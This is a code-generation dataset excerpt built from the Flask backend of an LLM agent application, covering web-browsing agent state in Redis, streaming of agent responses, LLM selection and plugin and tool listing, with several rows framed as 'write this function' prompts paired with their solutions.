save_webot_to_redis(user_id, chat_id, webot)
def reset_webot_status(user_id: str, chat_id: str):
webot_status = {"webot_status": "idle", "url": None}
save_webot_status_to_redis(user_id, chat_id, webot_status)
def create_webot_interaction_executor(
llm: BaseLanguageModel,
llm_name: str,
user_id: str,
chat_id: str
) -> AgentExecutor:
"""Creates an agent executor for interaction.
Args:
llm: A llm model.
llm_name: A string llm name.
user_id: A string of user id.
chat_id: A string chat id.
Returns:
An agent executor.
"""
# Initialize memory
memory = ConversationReActBufferMemory(memory_key="chat_history",
return_messages=True, max_token_limit=10000)
class RunWebot:
def __init__(self, webot: WebotExecutor, llm: BaseLanguageModel, user_id: str,
chat_id: str):
self.llm = llm
self.webot = webot
self.user_id = user_id
self.chat_id = chat_id
def run(self, term: str) -> Union[str, Dict, DataModel]:
try:
user_id = self.user_id
chat_id = self.chat_id
reset_webot(user_id=user_id, chat_id=chat_id)
reset_webot_status(user_id=user_id, chat_id=chat_id)
raw_observation = self.webot.run(user_intent=term, llm=self.llm)
instruction, start_url = raw_observation["instruction"], \
raw_observation["start_url"]
webot = get_webot_from_redis(user_id=user_id, chat_id=chat_id)
webot.instruction = instruction
# webot.plan = get_plan(instruction, start_url)
webot.plan = ""
save_webot_to_redis(user_id=user_id, chat_id=chat_id, webot=webot)
webot_status = {
"webot_status": "running",
"url": start_url
}
save_webot_status_to_redis(user_id=user_id, chat_id=chat_id,
webot_status=webot_status)
while True:
webot = get_webot_from_redis(user_id=user_id, chat_id=chat_id)
if webot.finish or webot.interrupt or webot.error or webot.fail:
break
else:
sleep(0.5)
save_webot_status_to_redis(user_id=user_id, chat_id=chat_id,
webot_status={"webot_status": "idle",
"url": None})
webot = get_webot_from_redis(user_id=user_id, chat_id=chat_id)
webot.instruction = None
save_webot_to_redis(user_id=user_id, chat_id=chat_id, webot=webot)
if webot.finish:
webot = get_webot_from_redis(user_id=user_id, chat_id=chat_id)
action_history = webot.action_history
last_page = webot.pages_viewed[-1]
observation = JsonDataModel.from_raw_data(
{
"success": True,
"result": json.dumps({"action_history": action_history,
"last_page": last_page}, indent=4),
"intermediate_steps": json.dumps(
{"instruction": instruction, "start_url": start_url},
indent=4)
}
)
return observation
if webot.fail:
observation = JsonDataModel.from_raw_data(
{
"success": True,
"result": "The webot failed to execute the instruction.",
"intermediate_steps": json.dumps(
{"instruction": instruction, "start_url": start_url},
indent=4)
}
)
return observation
if webot.interrupt:
observation = JsonDataModel.from_raw_data(
{
"success": False,
"result": "The web browsing is interrupted by user.",
"intermediate_steps": json.dumps(
{"instruction": instruction, "start_url": start_url},
indent=4)
}
)
return observation
if webot.error:
observation = JsonDataModel.from_raw_data(
{
"success": False,
"result": "Error occurs during web browsing.",
"intermediate_steps": json.dumps(
{"instruction": instruction, "start_url": start_url},
indent=4)
}
)
return observation
except Exception as e:
print(traceback.format_exc())
observation = JsonDataModel.from_raw_data(
{
"success": False,
"result": f"Failed in web browsing with the input: {term}, please try again later.",
"intermediate_steps": json.dumps({"error": str(e)})
}
)
return observation
webot = WebotExecutor.from_webot()
llm = copy.deepcopy(llm)
run_webot = RunWebot(webot, llm, chat_id=chat_id, user_id=user_id)
tools = [Tool(name=webot.name, func=run_webot.run, description=webot.description)]
continue_model = llm_name if llm_name in NEED_CONTINUE_MODEL else None
interaction_executor = initialize_webot_agent(
tools, llm, continue_model, memory=memory, verbose=True
)
return interaction_executor
def get_llm(llm_name: str, **kwargs) -> BaseLanguageModel:
"""Gets the llm model by its name."""
if llm_name in ["gpt-3.5-turbo-16k", "gpt-4"]:
openai_api_type = os.getenv("OPENAI_API_TYPE", "open_ai")
if openai_api_type == "open_ai":
chat_openai = ChatOpenAI
kwargs.update({"model_name": llm_name})
elif openai_api_type == "azure":
chat_openai = AzureChatOpenAI
kwargs.update({"deployment_name": llm_name})
return chat_openai(
streaming=True,
verbose=True,
**kwargs
)
elif llm_name in ["claude-v1", "claude-2"]:
anthropic_api_key = os.getenv("ANTHROPIC_API_KEY", "")
return ChatAnthropic(
model=llm_name,
streaming=True,
verbose=True,
anthropic_api_key=anthropic_api_key,
**kwargs,
)
elif llm_name == "lemur-chat":
return ChatOpenAI(
model_name="lemur-70b-chat-v1",
streaming=True,
openai_api_base="https://model-api.xlang.ai/v1",
verbose=True,
max_tokens=2048,
**kwargs
)
else:
raise ValueError(f"llm_name {llm_name} not found")
logger = init_log(
error=os.path.join(".logging", "error.log"),
runtime=os.path.join(".logging", "runtime.log"),
serialize=os.path.join(".logging", "serialize.log"),
trace=os.path.join(".logging", "trace.log"),
)
message_pool: MessageMemoryManager = MessageMemoryManager(name="message_pool", backend=MESSAGE_MEMORY_MANAGER_BACKEND)
message_id_register = VariableRegister(name="message_id_register", backend=VARIABLE_REGISTER_BACKEND)
def single_round_chat_with_agent_streaming(
stream_handler: AgentStreamingStdOutCallbackHandler,
interaction_executor: AgentExecutor,
user_intent: str,
human_message_id: int,
ai_message_id: int,
user_id: str,
chat_id: str,
message_list: List[Dict[str, Any]],
parent_message_id: int,
llm_name: str,
app_type: str = "plugins",
) -> Any:
"""Streams the response of the agent to the frontend."""
assert app_type in APP_TYPES, f"app_type should be one of {APP_TYPES}"
with multiprocess.Manager() as share_manager:
err_pool: Dict[str, Any] = share_manager.dict()
memory_pool: Dict[str, Any] = share_manager.dict()
share_list = share_manager.list()
memory_pool[chat_id] = []
stream_handler.for_display = share_list
chat_thread = multiprocess.Process(
target=_wrap_agent_caller,
args=(
interaction_executor,
{
"input": user_intent,
},
chat_id,
err_pool,
memory_pool,
[stream_handler],
),
)
threading_pool.register_thread(chat_id, chat_thread)
chat_thread.start()
empty_s_time: float = -1
last_heartbeat_time: float = -1
timeout = TIME_OUT_MAP[app_type]
LEFT_SIGN = "("
RIGHT_SIGN = ")"
start_buffer = False
streamed_transition_text_buffer = ""
streamed_links = []
converted_card_info_list = []
yield pack_json(
{
"human_message_id": human_message_id,
"ai_message_id": ai_message_id,
}
)
# Display streaming to frontend
display_stream = DisplayStream(execution_result_max_tokens=EXECUTION_RESULT_MAX_TOKENS_MAP[app_type])
is_block_first, current_block_type = False, None
intermediate_list, final_list = [], [] # Only for database storage
try:
while chat_thread.is_alive() or len(stream_handler.for_display) > 0:
# print(memory_pool, err_pool, "out")
if stream_handler.is_end:
# The ending of the streaming is marked by the is_end variable from AgentStreamingStdOutCallbackHandler in agent_streaming.py
break
if len(stream_handler.for_display) == 0:
# first time display list is empty
if empty_s_time == -1:
empty_s_time = time.time()
# already empty for some time
else:
if time.time() - empty_s_time > timeout and chat_thread.is_alive():
threading_pool.timeout_thread(chat_id)
break
if last_heartbeat_time == -1:
last_heartbeat_time = time.time()
else:
if time.time() - last_heartbeat_time > HEARTBEAT_INTERVAL and chat_thread.is_alive():
last_heartbeat_time = -1
yield _streaming_token(
{"text": "🫀", "type": "heartbeat", "final": False}, False, user_id, chat_id, False
)
else:
empty_s_time = -1
last_heartbeat_time = -1
while len(stream_handler.for_display) > 0:
token = stream_handler.for_display.pop(0)
items_to_display = display_stream.display(token)
# Skip the "identifier" and "key" token
if items_to_display is None:
continue
for item in items_to_display:
# Check if the block type is changed
if item["type"] != current_block_type:
current_block_type = item["type"]
is_block_first = True
else:
is_block_first = False
is_final = item.get("final", False)
# Render the item(s)
if item["type"] in STREAM_BLOCK_TYPES:
# Render image and echarts as block
yield _streaming_block(item, is_final, user_id, chat_id)
elif item["type"] in STREAM_TOKEN_TYPES:
# Render the rest as plain text
item["text"] = _render_preprocess(item["text"])
yield _streaming_token(item, is_final, user_id, chat_id, is_block_first)
# Save the intermediate steps and final answer
if is_final:
final_list.append(item)
else:
intermediate_list.append(item)
if item["type"] == "transition" and item["text"] == RIGHT_SIGN:
start_buffer = False
link = streamed_transition_text_buffer
streamed_transition_text_buffer = ""
card_info_list = extract_card_info_from_text(link)
# empty the buffer after extracting card info
streamed_transition_text_buffer = ""
if len(card_info_list) > 0:
streaming_card_info_list: list[dict[str, Any]] = [
{
"final_answer": {
"text": json.dumps(card_info),
"type": "card_info",
},
"is_block_first": False,
"streaming_method": "card_info",
"user_id": user_id,
"chat_id": chat_id,
}
for card_info in card_info_list
]
streamed_links.extend([card_info["web_link"] for card_info in card_info_list])
converted_card_info_list.extend(
[
{
"text": stream_card_info["final_answer"]["text"],
"type": stream_card_info["final_answer"]["type"],
}
for stream_card_info in streaming_card_info_list
]
)
for streaming_card_info in streaming_card_info_list:
yield pack_json(streaming_card_info)
if start_buffer == True:
streamed_transition_text_buffer += item["text"]
if item["type"] == "transition" and item["text"] == LEFT_SIGN:
start_buffer = True
except Exception as e:
import traceback
traceback.print_exc()
# Wait for the chat thread to finish
chat_thread.join()
stop_flag, timeout_flag, error_msg = threading_pool.flush_thread(chat_id)
error_msg = err_pool.pop(chat_id, None)
# Response Error!!
if stop_flag:
yield pack_json({"success": False, "error": "stop"})
return
elif timeout_flag:
yield pack_json({"success": False, "error": "timeout"})
return
elif error_msg is not None:
error_msg_to_render = error_rendering(error_msg)
yield pack_json({"success": False, "error": "internal", "error_msg": error_msg_to_render})
return
elif len(memory_pool[chat_id]) == 0:
yield pack_json({"success": False, "error": "internal"})
return
# Response Success!!
message_list_from_memory = memory_pool[chat_id]
del stream_handler
# share_manager.shutdown()
del memory_pool, err_pool, share_list, share_manager, interaction_executor
# Save conversation to memory
new_human_message = message_list_from_memory[-2]
new_ai_message = message_list_from_memory[-1]
new_human_message.update({"message_id": human_message_id, "parent_message_id": parent_message_id})
new_ai_message.update({"message_id": ai_message_id, "parent_message_id": human_message_id})
message_list.extend([new_human_message, new_ai_message])
logger.bind(user_id=user_id, chat_id=chat_id, api="/chat", msg_head="New human message").debug(new_human_message)
logger.bind(user_id=user_id, chat_id=chat_id, api="/chat", msg_head="New ai message").debug(new_ai_message)
MessageMemoryManager.set_pool_info_with_id(message_pool, user_id, chat_id, message_list)
# Save conversation to database
db = get_user_conversation_storage()
# Combine the streaming tokens/blocks
intermediate_list_combined = _combine_streaming(intermediate_list)
final_list_combined = _combine_streaming(final_list)
if len(converted_card_info_list) > 0:
final_list_combined.extend(converted_card_info_list)
# Insert User Message, if regenerate there is no need to insert again
db.message.insert_one(
{
"conversation_id": chat_id,
"user_id": user_id,
"message_id": human_message_id,
"parent_message_id": parent_message_id,
"version_id": 0,
"role": "user",
"data_for_human": user_intent,
"data_for_llm": message_list[-2]["message_content"],
"raw_data": None,
}
)
# Insert AI Message
db.message.insert_one(
{
"conversation_id": chat_id,
"user_id": user_id,
"message_id": ai_message_id,
"parent_message_id": human_message_id,
"version_id": 0,
"role": "assistant",
"data_for_human": {
"intermediate_steps": intermediate_list_combined,
"final_answer": final_list_combined,
},
"data_for_llm": message_list[-1]["message_content"],
"raw_data": None,
}
)
OVERLOAD = 503
DEFAULT_USER_ID = "DefaultUser"
class AgentStreamingStdOutCallbackHandler(StreamingStdOutCallbackHandler):
is_end = False
generated_tokens: list = []
for_display: list = []
# Automata
pda = JSON_PDA()
llm_call_id = 0
_in_json = False
_in_key = False
_in_value = False
_direct_display = True
_normal_json = False
json_key: str = ""
json_tmp_stack: list = []
action_key_appear = False
def always_verbose(self) -> bool:
"""Whether to call verbose callbacks even if verbose is False."""
return True
def on_llm_start(self, serialized: Dict[str, Any], prompts: List[str], **kwargs: Any) -> None:
self.is_end = False
self.generated_tokens = []
self.pda = JSON_PDA()
self.llm_call_id += 1
self._in_json = False
self._in_key = False
self._in_value = False
self._direct_display = True
self._normal_json = False
self.json_key = ""
self.json_tmp_stack = []
def on_llm_new_token(self, token: str, **kwargs: Any) -> None:
"""
Run on new LLM token. Only available when streaming is enabled.
The tokens that we can decide their types ('plain', 'identifier', 'key', 'action', 'action_input') are stored in `self.for_display`.
"""
self.generated_tokens.append(token)
# Automata that monitor json block
for char in token:
self.pda.transition(char)
# Handle the logic of sentences and json blocks
_type = "plain"
if self.pda.state in ["open_brace", "open_one_backtick"]:
self._in_json = True
self._direct_display = False
self._normal_json = False
self.action_key_appear = False
if self._in_json and not self._normal_json:
_type = "identifier"
if self.pda.state == "in_block":
_type = "plain"
self._normal_json = True
if self.pda.state == "open_key_quote":
if self._in_key:
self.json_key += char
_type = "key"
self._in_key = True
else:
self._in_key = False
if self.pda.state == "open_value_quote" or self.pda.state == "open_value_quote_brace":
if self._in_value:
_type = self.json_key
self._in_value = True
else:
if self._in_value:
self.json_key = ""
self._in_value = False
if self.pda.state == "close_key_quote":
# Normal json block
if self.json_key not in ["action", "action_input"]:
for char_item in self.json_tmp_stack:
self.for_display.append(
{"text": char_item["text"], "type": "plain", "llm_call_id": self.llm_call_id}
)
self.json_tmp_stack = []
self.for_display.append({"text": char, "type": "plain", "llm_call_id": self.llm_call_id})
self._normal_json = True
continue
else:
if self.json_key == "action":
self.action_key_appear = True
elif self.json_key == "action_input" and self.action_key_appear:
# Action json block
for char_item in self.json_tmp_stack:
char_item["llm_call_id"] = self.llm_call_id
self.for_display.append(char_item)
self.json_tmp_stack = []
self._direct_display = True
else:
for char_item in self.json_tmp_stack:
self.for_display.append(
{"text": char_item["text"], "type": "plain", "llm_call_id": self.llm_call_id}
)
self.json_tmp_stack = []
self._direct_display = True
if self.pda.state == "start":
self._in_json = False
self.for_display.append(
{"text": char, "type": _type, "llm_call_id": self.llm_call_id}
) if self._direct_display else self.json_tmp_stack.append(
{"text": char, "type": _type, "llm_call_id": self.llm_call_id}
)
def on_llm_end(self, response, **kwargs: Any) -> None:
"""Run when LLM ends running."""
self.is_end = True
for char_item in self.json_tmp_stack:
self.for_display.append({"text": char_item["text"], "type": "plain", "llm_call_id": self.llm_call_id})
def on_tool_end(self, output: Union[DataModel, str], **kwargs: Any) -> None:
"""Run on tool end to add observation data model."""
self.for_display.append({"text": output, "type": "block", "llm_call_id": self.llm_call_id})
The provided code snippet includes necessary dependencies for implementing the `chat_xlang_webot` function. Write a Python function `def chat_xlang_webot() -> Dict` to solve the following problem:
Returns the chat response of web agent.
Here is the function:
def chat_xlang_webot() -> Dict:
"""Returns the chat response of web agent."""
try:
# Get request parameters
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
user_intent = request_json["user_intent"]
parent_message_id = request_json["parent_message_id"]
llm_name = request_json["llm_name"]
temperature = request_json.get("temperature", 0.4)
stop_words = ["[RESPONSE_BEGIN]", "TOOL RESPONSE"]
kwargs = {
"temperature": temperature,
"stop": stop_words,
}
# Get language model
llm = get_llm(llm_name, **kwargs)
logger.bind(user_id=user_id, chat_id=chat_id, api="/chat",
msg_head="Request json").debug(request_json)
human_message_id = message_id_register.add_variable(user_intent)
ai_message_id = message_id_register.add_variable("")
stream_handler = AgentStreamingStdOutCallbackHandler()
# Build executor and run chat
# reset webot and status
reset_webot(user_id=user_id, chat_id=chat_id)
reset_webot_status(user_id=user_id, chat_id=chat_id)
interaction_executor = create_webot_interaction_executor(
llm=llm,
llm_name=llm_name,
chat_id=chat_id,
user_id=user_id
)
activated_message_list = message_pool.get_activated_message_list(user_id,
chat_id,
list(),
parent_message_id)
message_pool.load_agent_memory_from_list(interaction_executor.memory,
activated_message_list)
return stream_with_context(
Response(
single_round_chat_with_agent_streaming(
interaction_executor=interaction_executor,
user_intent=user_intent,
human_message_id=human_message_id,
ai_message_id=ai_message_id,
user_id=user_id,
chat_id=chat_id,
message_list=activated_message_list,
parent_message_id=parent_message_id,
stream_handler=stream_handler,
llm_name=llm_name,
app_type="webot",
),
content_type="application/json",
)
)
except Exception as e:
import traceback
traceback.print_exc()
return Response(response=None,
status=f"{OVERLOAD} backend is currently overloaded") | Returns the chat response of web agent. |
188,446 | from flask import request, jsonify, Response
from backend.main import app
from backend.schemas import DEFAULT_USER_ID
from backend.api.chat_webot import get_webot_from_redis, \
get_webot_status_from_redis, reset_webot_status
DEFAULT_USER_ID = "DefaultUser"
def get_webot_from_redis(user_id: str, chat_id: str, ) -> WebBrowsingExecutor:
data = r.get(f'webot_{user_id}_{chat_id}')
if data is not None:
webot = pickle.loads(data)
else:
# initialize a webot with None instrucition if webot does not exist
webot = WebBrowsingExecutor(None)
save_webot_to_redis(user_id, chat_id, webot)
return webot
def get_instruction() -> Response:
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
webot = get_webot_from_redis(user_id=user_id, chat_id=chat_id)
return jsonify({
"chat_id": chat_id,
"user_id": user_id,
"instructions": webot.instruction
}) | null |
188,447 | from flask import request, jsonify, Response
from backend.main import app
from backend.schemas import DEFAULT_USER_ID
from backend.api.chat_webot import get_webot_from_redis, \
get_webot_status_from_redis, reset_webot_status
DEFAULT_USER_ID = "DefaultUser"
def get_webot_status_from_redis(user_id: str, chat_id: str):
webot_status_json = r.get(f'webot_status_{user_id}_{chat_id}')
if webot_status_json is not None:
webot_status = json.loads(webot_status_json)
return webot_status
else:
return {}
def get_webot_status() -> Response:
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
webot_status_json = get_webot_status_from_redis(user_id=user_id, chat_id=chat_id)
return jsonify(webot_status_json) if webot_status_json is not None else jsonify(
{"webot_status": None, "url": None}) | null |
188,448 | from flask import request, jsonify, Response
from backend.main import app
from backend.schemas import DEFAULT_USER_ID
from backend.api.chat_webot import get_webot_from_redis, \
get_webot_status_from_redis, reset_webot_status
DEFAULT_USER_ID = "DefaultUser"
def reset_webot_status(user_id: str, chat_id: str):
webot_status = {"webot_status": "idle", "url": None}
save_webot_status_to_redis(user_id, chat_id, webot_status)
def reset_status() -> Response:
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
reset_webot_status(user_id=user_id, chat_id=chat_id)
return jsonify({
"chat_id": chat_id,
"user_id": user_id,
}) | null |
188,449 | from flask import request, jsonify, Response
from backend.api.chat_webot import get_webot_from_redis, save_webot_to_redis
from backend.main import app
from backend.schemas import DEFAULT_USER_ID
from backend.api.language_model import get_llm
def get_webot_from_redis(user_id: str, chat_id: str, ) -> WebBrowsingExecutor:
data = r.get(f'webot_{user_id}_{chat_id}')
if data is not None:
webot = pickle.loads(data)
else:
# initialize a webot with None instrucition if webot does not exist
webot = WebBrowsingExecutor(None)
save_webot_to_redis(user_id, chat_id, webot)
return webot
def save_webot_to_redis(user_id: str, chat_id: str, webot: WebBrowsingExecutor, ):
r.set(f'webot_{user_id}_{chat_id}', pickle.dumps(webot))
DEFAULT_USER_ID = "DefaultUser"
def get_llm(llm_name: str, **kwargs) -> BaseLanguageModel:
"""Gets the llm model by its name."""
if llm_name in ["gpt-3.5-turbo-16k", "gpt-4"]:
openai_api_type = os.getenv("OPENAI_API_TYPE", "open_ai")
if openai_api_type == "open_ai":
chat_openai = ChatOpenAI
kwargs.update({"model_name": llm_name})
elif openai_api_type == "azure":
chat_openai = AzureChatOpenAI
kwargs.update({"deployment_name": llm_name})
return chat_openai(
streaming=True,
verbose=True,
**kwargs
)
elif llm_name in ["claude-v1", "claude-2"]:
anthropic_api_key = os.getenv("ANTHROPIC_API_KEY", "")
return ChatAnthropic(
model=llm_name,
streaming=True,
verbose=True,
anthropic_api_key=anthropic_api_key,
**kwargs,
)
elif llm_name == "lemur-chat":
return ChatOpenAI(
model_name="lemur-70b-chat-v1",
streaming=True,
openai_api_base="https://model-api.xlang.ai/v1",
verbose=True,
max_tokens=2048,
**kwargs
)
else:
raise ValueError(f"llm_name {llm_name} not found")
The provided code snippet includes necessary dependencies for implementing the `get_action` function. Write a Python function `def get_action() -> Response` to solve the following problem:
Gets the next action to take for a given the current page HTML.
Here is the function:
def get_action() -> Response:
"""Gets the next action to take for a given the current page HTML."""
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
webot = get_webot_from_redis(user_id=user_id, chat_id=chat_id)
# Get request parameters
request_json = request.get_json()
processed_html = request_json["processed_html"]
llm = get_llm("gpt-4")
result = webot.run(processed_html, llm=llm)
save_webot_to_redis(user_id=user_id, chat_id=chat_id, webot=webot)
return jsonify({
"chat_id": chat_id,
"user_id": user_id,
"action_response": result,
}) | Gets the next action to take for a given the current page HTML. |
188,450 | from flask import request, jsonify, Response
from backend.api.chat_webot import get_webot_from_redis, save_webot_to_redis
from backend.main import app
from backend.schemas import DEFAULT_USER_ID
from backend.api.language_model import get_llm
def get_webot_from_redis(user_id: str, chat_id: str, ) -> WebBrowsingExecutor:
data = r.get(f'webot_{user_id}_{chat_id}')
if data is not None:
webot = pickle.loads(data)
else:
# initialize a webot with None instrucition if webot does not exist
webot = WebBrowsingExecutor(None)
save_webot_to_redis(user_id, chat_id, webot)
return webot
def save_webot_to_redis(user_id: str, chat_id: str, webot: WebBrowsingExecutor, ):
r.set(f'webot_{user_id}_{chat_id}', pickle.dumps(webot))
DEFAULT_USER_ID = "DefaultUser"
The provided code snippet includes necessary dependencies for implementing the `interrupt` function. Write a Python function `def interrupt() -> Response` to solve the following problem:
Interrupts the current webot.
Here is the function:
def interrupt() -> Response:
"""Interrupts the current webot."""
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
interrupt = request_json["interrupt"]
if interrupt:
webot = get_webot_from_redis(user_id=user_id, chat_id=chat_id)
webot.actions_taken.append("interrupt")
save_webot_to_redis(user_id=user_id, chat_id=chat_id, webot=webot)
return jsonify({
"chat_id": chat_id,
"user_id": user_id,
})
return jsonify({"message": "No interrupt signal received."}) | Interrupts the current webot. |
188,451 | from flask import request, jsonify, Response
from backend.api.chat_webot import get_webot_from_redis, save_webot_to_redis
from backend.main import app
from backend.schemas import DEFAULT_USER_ID
from backend.api.language_model import get_llm
def get_webot_from_redis(user_id: str, chat_id: str, ) -> WebBrowsingExecutor:
data = r.get(f'webot_{user_id}_{chat_id}')
if data is not None:
webot = pickle.loads(data)
else:
# initialize a webot with None instrucition if webot does not exist
webot = WebBrowsingExecutor(None)
save_webot_to_redis(user_id, chat_id, webot)
return webot
def save_webot_to_redis(user_id: str, chat_id: str, webot: WebBrowsingExecutor, ):
r.set(f'webot_{user_id}_{chat_id}', pickle.dumps(webot))
DEFAULT_USER_ID = "DefaultUser"
The provided code snippet includes necessary dependencies for implementing the `error` function. Write a Python function `def error() -> Response` to solve the following problem:
Appends action 'error' to the current webot.
Here is the function:
def error() -> Response:
"""Appends action 'error' to the current webot."""
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
error = request_json["error"]
if error:
webot = get_webot_from_redis(user_id=user_id, chat_id=chat_id)
webot.actions_taken.append("error")
save_webot_to_redis(user_id=user_id, chat_id=chat_id, webot=webot)
return jsonify({
"chat_id": chat_id,
"user_id": user_id,
})
return jsonify({"message": "No error signal received."}) | Appends action 'error' to the current webot. |
188,452 | from typing import Dict
from flask import request, jsonify, Response
from backend.main import message_pool
from backend.app import app
from backend.api.language_model import get_llm
from backend.utils.utils import get_user_and_chat_id_from_request_json
from real_agents.adapters.executors import QuestionSuggestionExecutor
from real_agents.adapters.memory import ConversationReActBufferMemory
message_pool: MessageMemoryManager = MessageMemoryManager(name="message_pool", backend=MESSAGE_MEMORY_MANAGER_BACKEND)
def get_llm(llm_name: str, **kwargs) -> BaseLanguageModel:
"""Gets the llm model by its name."""
if llm_name in ["gpt-3.5-turbo-16k", "gpt-4"]:
openai_api_type = os.getenv("OPENAI_API_TYPE", "open_ai")
if openai_api_type == "open_ai":
chat_openai = ChatOpenAI
kwargs.update({"model_name": llm_name})
elif openai_api_type == "azure":
chat_openai = AzureChatOpenAI
kwargs.update({"deployment_name": llm_name})
return chat_openai(
streaming=True,
verbose=True,
**kwargs
)
elif llm_name in ["claude-v1", "claude-2"]:
anthropic_api_key = os.getenv("ANTHROPIC_API_KEY", "")
return ChatAnthropic(
model=llm_name,
streaming=True,
verbose=True,
anthropic_api_key=anthropic_api_key,
**kwargs,
)
elif llm_name == "lemur-chat":
return ChatOpenAI(
model_name="lemur-70b-chat-v1",
streaming=True,
openai_api_base="https://model-api.xlang.ai/v1",
verbose=True,
max_tokens=2048,
**kwargs
)
else:
raise ValueError(f"llm_name {llm_name} not found")
def get_user_and_chat_id_from_request_json(request_json: Dict) -> Tuple[str, str]:
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
return user_id, chat_id
The provided code snippet includes necessary dependencies for implementing the `recommend` function. Write a Python function `def recommend() -> dict | Response` to solve the following problem:
Recommends potential inputs for users.
Here is the function:
def recommend() -> dict | Response:
"""Recommends potential inputs for users. """
try:
request_json = request.get_json()
(user_id, chat_id) = get_user_and_chat_id_from_request_json(request_json)
parent_message_id = int(request_json["parent_message_id"])
user_intent = request_json["user_intent"]
# Find the mainstat message list from leaf to root
activated_message_list = message_pool.get_activated_message_list(
user_id, chat_id, default_value=list(), parent_message_id=parent_message_id
)
chat_memory = ConversationReActBufferMemory(memory_key="chat_history", return_messages=True)
message_pool.load_agent_memory_from_list(chat_memory, activated_message_list)
question_suggestion_executor = QuestionSuggestionExecutor()
llm_name = request_json["llm_name"]
temperature = request_json.get("temperature", 0.7)
kwargs = {
"temperature": temperature,
}
# Get language model
llm = get_llm(llm_name, **kwargs)
follow_questions = question_suggestion_executor.run(
user_intent=user_intent,
llm=llm,
chat_memory=chat_memory,
mode="chat_memory",
)
return jsonify({
"recommend_questions": follow_questions["questions"],
"user_id": user_id,
"chat_id": chat_id,
})
except Exception as e:
import traceback
traceback.print_exc()
return {
"recommend_questions": [],
"user_id": user_id,
"chat_id": chat_id,
} | Recommends potential inputs for users. |
188,453 | from typing import List
from flask import jsonify
from backend.app import app
DATA_TOOLS = [
{
"type": "language",
"id": "1cea1f39-fe63-4b08-83d5-fa4c93db0c87",
"name": "SQLQueryBuilder",
"name_for_human": "SQL",
"pretty_name_for_human": "SQL Query Generation",
"icon": "",
"description": "Using SQL as the programming language",
},
{
"type": "language",
"id": "0c135359-af7e-473b-8425-1393d2943b57",
"name": "PythonCodeBuilder",
"name_for_human": "Python",
"pretty_name_for_human": "Python Code Generation",
"icon": "",
"description": "Using Python as the programming language",
},
{
"type": "tool",
"id": "a86aebe1-a780-4038-a333-fb2a9d2d25fc",
"name": "Echarts",
"name_for_human": "Echarts",
"pretty_name_for_human": "Echarts",
"icon": "",
"description": "Enhancing the analyzing experience with interactive charts",
},
{
"type": "tool",
"id": "c7c826ba-5884-4e2b-b27c-fedea30c1749",
"name": "KaggleDataLoader",
"name_for_human": "Kaggle Data Search",
"pretty_name_for_human": "Kaggle Data Search",
"icon": "",
"description": "Search & Connect to kaggle datasets",
},
{
"type": "tool",
"id": "8f8e8dbc-ae5b-4950-9f4f-7f5238978806",
"name": "DataProfiling",
"name_for_human": "Data Profiling",
"pretty_name_for_human": "Data Profiling",
"icon": "",
"description": "Intelligent profiling for your data",
},
]
The provided code snippet includes necessary dependencies for implementing the `get_data_tool_list` function. Write a Python function `def get_data_tool_list() -> List[dict]` to solve the following problem:
Gets the data tool list.
Here is the function:
def get_data_tool_list() -> List[dict]:
"""Gets the data tool list. """
for i, tool in enumerate(DATA_TOOLS):
cache_path = f"backend/static/images/{tool['name']}.cache"
with open(cache_path, 'r') as f:
image_content = f.read()
DATA_TOOLS[i]["icon"] = image_content
return jsonify(DATA_TOOLS) | Gets the data tool list. |
188,454 | import base64
import copy
import json
import os
import random
import traceback
from typing import Dict, List, Union
import requests
from flask import Response, request, stream_with_context
from retrying import retry
from backend.api.language_model import get_llm
from backend.app import app
from backend.main import message_id_register, message_pool, logger
from backend.utils.streaming import single_round_chat_with_agent_streaming
from backend.schemas import OVERLOAD, NEED_CONTINUE_MODEL, DEFAULT_USER_ID
from backend.main import api_key_pool
from real_agents.adapters.llm import BaseLanguageModel
from real_agents.adapters.agent_helpers import AgentExecutor, Tool
from real_agents.adapters.callbacks.agent_streaming import \
AgentStreamingStdOutCallbackHandler
from real_agents.adapters.data_model import DataModel, JsonDataModel
from real_agents.adapters.interactive_executor import initialize_plugin_agent
from real_agents.adapters.memory import ConversationReActBufferMemory
from real_agents.plugins_agent.plugins.utils import load_all_plugins_elements
from real_agents.plugins_agent.plugins.tool_selector import ToolSelector
from real_agents.plugins_agent import PluginExecutor
def make_request(_image_url) -> Response:
response = requests.get(_image_url) # Replace with your actual request code
response.raise_for_status() # Raise an exception for unsuccessful response status codes
return response | null |
188,455 | import base64
import copy
import json
import os
import random
import traceback
from typing import Dict, List, Union
import requests
from flask import Response, request, stream_with_context
from retrying import retry
from backend.api.language_model import get_llm
from backend.app import app
from backend.main import message_id_register, message_pool, logger
from backend.utils.streaming import single_round_chat_with_agent_streaming
from backend.schemas import OVERLOAD, NEED_CONTINUE_MODEL, DEFAULT_USER_ID
from backend.main import api_key_pool
from real_agents.adapters.llm import BaseLanguageModel
from real_agents.adapters.agent_helpers import AgentExecutor, Tool
from real_agents.adapters.callbacks.agent_streaming import \
AgentStreamingStdOutCallbackHandler
from real_agents.adapters.data_model import DataModel, JsonDataModel
from real_agents.adapters.interactive_executor import initialize_plugin_agent
from real_agents.adapters.memory import ConversationReActBufferMemory
from real_agents.plugins_agent.plugins.utils import load_all_plugins_elements
from real_agents.plugins_agent.plugins.tool_selector import ToolSelector
from real_agents.plugins_agent import PluginExecutor
global plugins
plugins = []
try:
tool_selector = ToolSelector(tools_list=plugins, mode="embedding", api_key_pool=api_key_pool)
except Exception as e:
print(e, "The auto selection feature of plugins agent will return random elements.")
tool_selector = None
plugins.append(
{
"id": plugin_type,
"name": plugin_type,
"name_for_human": plugin_info["meta_info"]["manifest"]["name_for_human"],
"description": plugin_info["description"],
"icon": encoded_image,
"require_api_key": plugin_info["need_auth"],
}
)
def create_plugins_interaction_executor(
